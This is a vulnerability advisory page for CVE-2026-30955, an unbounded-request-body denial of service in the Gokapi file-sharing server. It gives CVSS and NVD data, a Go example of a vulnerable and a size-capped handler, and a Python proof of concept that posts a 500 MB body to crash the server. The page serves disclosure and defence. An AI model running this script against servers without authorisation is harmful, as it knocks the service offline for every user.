Security Vulnerability Report
CVE-2026-30955 CVSS 6.5 MEDIUM

Published: 2026-03-13 19:54:36
Last Modified: 2026-03-17 13:46:57

Description

Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Before version 2.2.4, an API endpoint (the advisory does not name it) accepts unbounded request bodies without any size limit. An authenticated user can therefore make the server buffer an arbitrarily large body until the process is killed by the kernel's out-of-memory (OOM) handler, disrupting service for all users. The vulnerability is fixed in 2.2.4.
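The pattern behind this class of bug, shown here as an added example that is not Gokapi's code or its actual fix: a Go HTTP handler that buffers the whole body with io.ReadAll and no cap, beside the same handler with the body wrapped in http.MaxBytesReader. The endpoint path /api/upload, the 1 MiB cap and the response strings are assumptions made for the example; Gokapi's real endpoint, limit and fix may differ.

```go
package main

import (
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
)

// maxUploadBytes is an illustrative cap (assumption for this example);
// a real deployment picks a value that matches its largest legitimate upload.
const maxUploadBytes = 1 << 20 // 1 MiB

// vulnerableHandler mirrors the CWE-400 pattern the advisory describes:
// the entire body is read into memory with no upper bound, so one
// authenticated client can grow the process until it is OOM-killed.
func vulnerableHandler(w http.ResponseWriter, r *http.Request) {
	body, err := io.ReadAll(r.Body) // no limit: memory grows with the request
	if err != nil {
		http.Error(w, "read failed", http.StatusBadRequest)
		return
	}
	fmt.Fprintf(w, "stored %d bytes", len(body))
}

// hardenedHandler wraps the body in http.MaxBytesReader, which stops with a
// *http.MaxBytesError once more than maxUploadBytes have been read. Because
// it counts bytes actually read, it bounds memory even when Content-Length is
// absent (chunked encoding) or lies.
func hardenedHandler(w http.ResponseWriter, r *http.Request) {
	r.Body = http.MaxBytesReader(w, r.Body, maxUploadBytes)
	body, err := io.ReadAll(r.Body)
	if err != nil {
		var tooBig *http.MaxBytesError
		if errors.As(err, &tooBig) {
			http.Error(w, "request body too large", http.StatusRequestEntityTooLarge)
			return
		}
		http.Error(w, "read failed", http.StatusBadRequest)
		return
	}
	fmt.Fprintf(w, "stored %d bytes", len(body))
}

// post sends an n-byte body to handler and returns the status code and the
// trimmed response text, so the two handlers can be compared side by side.
func post(handler http.HandlerFunc, n int) (int, string) {
	// Constructed input: n bytes of filler, streamed from a reader as a real
	// upload would be; the handler must bound what it reads on its own.
	body := strings.NewReader(strings.Repeat("A", n))
	req := httptest.NewRequest(http.MethodPost, "/api/upload", body) // path is an assumption
	rec := httptest.NewRecorder()
	handler(rec, req)
	return rec.Code, strings.TrimSpace(rec.Body.String())
}

func main() {
	for _, n := range []int{1024, maxUploadBytes + 1} {
		c, msg := post(vulnerableHandler, n)
		fmt.Printf("vulnerable n=%d -> %d %s\n", n, c, msg)
		c, msg = post(hardenedHandler, n)
		fmt.Printf("hardened   n=%d -> %d %s\n", n, c, msg)
	}
}
```

Run with `go run .`: the vulnerable handler happily reports storing 1048577 bytes, while the hardened one answers 413 for the same request and still accepts the 1024-byte body. A per-handler cap like this is the fix the application owns; a body-size limit at the reverse proxy (for example nginx's client_max_body_size) is worthwhile defence in depth but does not replace it, because the limit must also hold for clients that reach the service directly.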

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Weakness
CWE-400 (Uncontrolled Resource Consumption)

Configurations (Affected Products)

cpe:2.3:a:forceu:gokapi:*:*:*:*:*:*:*:* - VULNERABLE
Gokapi < 2.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-30955 PoC - Gokapi Unbounded Request Body DoS

Note: This is for educational and authorized testing purposes only.
"""
import argparse

import requests


def create_large_payload(size_mb):
    """Generate a payload of the given size in MB (held in client memory)."""
    return b'\x00' * (size_mb * 1024 * 1024)


def exploit_gokapi_dos(target_url, api_path, auth_token):
    """
    Exploit CVE-2026-30955 by sending a very large request body to the
    affected endpoint so the server buffers it until it is OOM-killed.

    The authorization header scheme and the endpoint path are this PoC's
    assumptions; adjust both to match the target's API.
    """
    headers = {
        'Authorization': f'Bearer {auth_token}',
        'Content-Type': 'application/octet-stream',
    }

    # Size of the body to send; adjust based on the target server's memory.
    payload_size = 500  # MB
    print(f'[*] Generating {payload_size}MB payload...')
    payload = create_large_payload(payload_size)

    full_url = f'{target_url.rstrip("/")}/{api_path.lstrip("/")}'
    print(f'[*] Sending malicious request to {full_url}')
    print(f'[*] Payload size: {len(payload)} bytes')

    try:
        response = requests.post(full_url, headers=headers, data=payload, timeout=300)
        print(f'[!] Response status: {response.status_code}')
        return True
    except requests.exceptions.RequestException as e:
        # A dropped connection is consistent with the server process having died.
        print(f'[*] Request completed (connection may have been dropped): {e}')
        return True


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2026-30955 PoC')
    parser.add_argument('-t', '--target', required=True, help='Target Gokapi server URL')
    parser.add_argument('-p', '--path', default='api/v1/upload', help='API endpoint path')
    parser.add_argument('-k', '--token', required=True, help='Authentication token')
    args = parser.parse_args()

    print('[+] CVE-2026-30955 - Gokapi Unbounded Request Body DoS')
    exploit_gokapi_dos(args.target, args.path, args.token)
```

References

https://github.com/Forceu/Gokapi/security/advisories/GHSA-qwc6-vc2v-2ggj (Vendor Advisory)
https://github.com/Forceu/Gokapi/releases/tag/v2.2.4 (Product, Release Notes)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-30955",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-13T19:54:35.740",
    "lastModified": "2026-03-17T13:46:57.010",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, An API endpoint accepts unbounded request bodies without any size limit. An authenticated user can cause an OOM kill and complete service disruption for all users. This vulnerability is fixed in 2.2.4."
      },
      {
        "lang": "es",
        "value": "Gokapi es un servidor para compartir archivos autoalojado con expiración automática y soporte de cifrado. Antes de la versión 2.2.4, un endpoint de API acepta cuerpos de solicitud ilimitados sin ningún límite de tamaño. Un usuario autenticado puede causar un OOM kill y una interrupción completa del servicio para todos los usuarios. Esta vulnerabilidad está corregida en la versión 2.2.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-400"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:forceu:gokapi:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.2.4",
                "matchCriteriaId": "CE6F3F4D-D449-43DD-BB3D-86F98581926C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Forceu/Gokapi/releases/tag/v2.2.4",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/Forceu/Gokapi/security/advisories/GHSA-qwc6-vc2v-2ggj",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```